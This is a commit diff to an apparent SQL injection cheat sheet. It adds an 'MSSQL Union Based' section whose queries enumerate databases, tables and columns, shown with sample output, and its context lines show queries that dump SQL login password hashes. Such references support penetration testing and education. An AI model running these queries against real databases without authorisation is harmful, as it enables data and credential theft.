MSSQL union based + Windows Runas

2026-01-07 02:03:31 -08:00 · 2019-01-20 16:41:46 +01:00
parent 22c82cb277
commit 4db45a263a
4 changed files with 62 additions and 17 deletions
--- a/injection/MSSQL
+++ b/injection/MSSQL
@@ -57,6 +57,30 @@ SELECT name, password_hash FROM master.sys.sql_logins
 SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```

+## MSSQL Union Based
+
+```sql
+-- extract databases names
+$ SELECT name FROM master..sysdatabases
+[*] Injection
+[*] msdb
+[*] tempdb
+
+-- extract tables from Injection database
+$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
+[*] Profiles
+[*] Roles
+[*] Users
+
+-- extract columns for the table Users
+$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
+[*] UserId
+[*] UserName
+
+-- Finally extract the data
+$ SELECT  UserId, UserName from Users
+```
+
 ## MSSQL Error based

 ```sql